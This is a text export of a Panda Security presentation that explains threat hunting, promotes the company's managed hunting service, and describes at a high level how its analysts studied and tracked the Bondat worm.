Threat hunting is a proactive approach to security that involves actively searching networks for threats that evade traditional defenses like firewalls and antivirus. It involves forming hypotheses about potential attacks based on indicators and then validating those hypotheses by searching for related evidence. While threat hunting requires time, skills, and resources that many organizations lack, Panda Security's Threat Hunting and Investigation Service (THIS) provides threat hunting as a managed service at no extra cost with their Adaptive Defense 360 platform. THIS continuously monitors endpoints, forms hypotheses about attacks, and validates findings to detect threats that other solutions may miss.
1. What is Threat Hunting?
And Why Do You Need It?
Diogo Pata
Subsidiaries Presales Manager
Panda Security HQ
2. Agenda
• What is Threat Hunting?
• Why is it Becoming Popular?
• What are the Challenges?
• Panda T.H.I.S.
• Practical Case Example
• Summary
• Q & A
4. Definition
“…the process of proactively and iteratively searching through networks to
detect and isolate advanced threats that evade existing security solutions.”
This is in contrast to traditional threat management measures, such as
firewalls, intrusion detection systems (IDS), malware sandbox (computer
security) and SIEM systems, which typically involve an investigation after
there has been a warning of a potential threat or an incident has occurred.”
5. Definition
• Proactive versus Reactive approach to threats
• Threat hunting is not incident response, but they are connected
• Threat hunting covers what the tools in place cannot see
• It is not a replacement for other strategies, such as threat detection
6. Gartner’s Contrast
Deploy detection
content
(rules,
algorithms)
Receive alerts
when conditions
match
Triage alerts
Respond to an
incident
Threat Detection
Formulate a
hypothesis
Look for it in the
environment
If proven, pivot
and expand the
scope
Threat Hunting
Respond to an
incident
Develop new
detection content
If not proven,
go back Gartner 2017 How to Hunt for Security Threats.
Anton Chuvakin, 6 April 2017. ID: G00327290.
8. Proactive Trends
• Solutions
• EPP to EDR
• Being phished to phishing
yourself
• Practices
• Passive wait and see
• Penetration testing
• Red teams
9. Valuable Traces
• Attacks leave behind valuable
traces
• Failed attacks
• Probes
• Discover weaknesses
• Find activity before it becomes a
disaster
10. *IBM/Ponemon 2018 Cost of Data Breach Study
Breaches are
Expensive!
• Average cost of a breach in the US
is $7.9M
• Average cost of a breach globally is
$3.8M
• Takes an average of 197 days to
identify a breach
• Average span of 69 days to contain
a breach
11. Infections are
Dwindling
• 2016 had 40% fewer infections than 2015
• 2017 improvement is 70%
• 2018 Next to zero infections reported
12. Infections are
Dwindling Hackers are the new problem
• Trained by governments, security
companies, and criminal organizations
• Create targeted attacks with proprietary
malware
• Using applications and goodware to fly
under the radar
• An equivalent response to this is needed
14. Time
• Are you the I.T. administrator, technician, and
CISO already?
• Time is your enemy
• Likely not enough time to do threat
hunting
• Time needed to effectively hunt for threats
• Collect data, create hypothesis, try to
validate
• Time is needed to research
• Attack indicators
• IOAs
• IOC
• Attacker patterns
• Threat groups
19. Threat Hunting
The Adaptive Defense Service
• It continuously monitors the endpoint for
security attacks by internal and external
agents.
• Find attackers that are not using
malware.
Benefits
Hacker detection
• Next-gen or malware-less attacks
• Lateral movements
Identification of malicious employees
• User behavior modeling
• Identity control, data control
20. The Threat Hunting Process
Where could we find the attack?
Customers
Event Storage
Historic Timeline
3. Incident Confirmation
• Service Orchestrator
• Forensic Console
Events Stream
1. Hypothesis Generation
Back Testing Console
2. Trigger Detonation
Threat Engine
21. Event Telemetry
Main events gathered:
Process
• Creation
• Injections
Files
• Creation
• Modification
• Open
Communications
• IPs Origin and Destiny
• Downloads ( URLs )
Registry
• Creation
• Modification
Administrative
• Installation
• Turn on/off
GLOBAL NUMBERS (12 MONTHS)
• ~4000 EVENTS PER MACHINE
• ~4000M EVENTS
PROCESSED DAILY IN BIG
DATA
• ~500,000M EVENT STORED.
• ~500 DETECTION CONTENTS
• ~4 BILLION APPLICATIONS
PROFILED
• ~2,5 BILLIONS
WORKSTATIONS PROFILED
• ~3,5 BILLIONS ID´S
PROFILED
23. Study of a threat, hypothesis generation, and
validation
Threat Hunting:
Bondat – the Invisible Worm
Step 1: The Study:
An expert threat hunter analyzes the family, studies
the characteristics and discovers that:
• It is a worm written in JavaScript / VBScript
• It is spread by removable drives (pen drives,
hard drives, etc.) by creating LNKs
• It is placed in the startup of the system
• The C & C server updates its code
• Anti-debug / anti-vm / anti-emulation measures
• Highly obfuscated in the latest versions
• Very difficult to detect statically / firm
• It spreads throughout the network very quickly
• Very difficult to disinfect after spreading through
the network
24. Hypothesis Generation of :
• Based on possible communications with C & Cs
• Based on type of concealment and type of
executions (extended)
• Based on type of events.
Hypothesis
generation
Threat Hunting:
Bondat – the Invisible Worm
Back testing
console
Retrospective Event
storage
Hypothesis Validation:
• We find the worm downloading and running
Powershells (not seen before, new functionality).
• We see it downloading JavaScripts.
• Download the PHP interpreter and then make
another query to another website to get a new PHP
code to execute.
Study of a threat, generation of hypotheses and validation
25. Attacks found:
• Knowing the C & C communication details, it was possible
to pose as an infected machine and collect the latest
payloads that the attackers were launching.
Study of a threat, generation of hypotheses and validation
Threat Hunting:
Bondat - The invisible worm
• Bruteforce on a list of sites with WordPress to trojanize
them
• Download and installation of Miners for economic gain.
• Denial of service to the NRA (US National Rifle
Association).
IOAs
• Generation of new IOAs.
• New detection content creation.
• Incident notification to customer.
26. . This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Panda Security.
Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner
research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research,
including any warranties of merchantability or fitness for a particular purpose.
• According to Gartner2: “Organizations should
pay particular attention to solutions that
include managed services like threat hunting
or file classification.
• Panda Security's unique value proposition is the
classification or attestation of every single
executable file and process on a protected
endpoint device, and it is the only vendor to
include a managed threat hunting service in
the base purchase of its EPP. ”
Panda Adaptive Defense 360 provides both
managed services, at no extra cost:
Panda Security named
Magic Quadrant Visionary
100%
Attestation
Service
Threat Hunting
& Investigation
Service
27. • Malware is not the only problem to solve; the focus is shifting to
include real time attacks and hackers
• Attackers are evolving and adapting to tools and services.
Continuous analysis and threat hunting is the solution
• Panda’s Adaptive Defense 360 platform provides all of this for you
by just installing the protection
Summary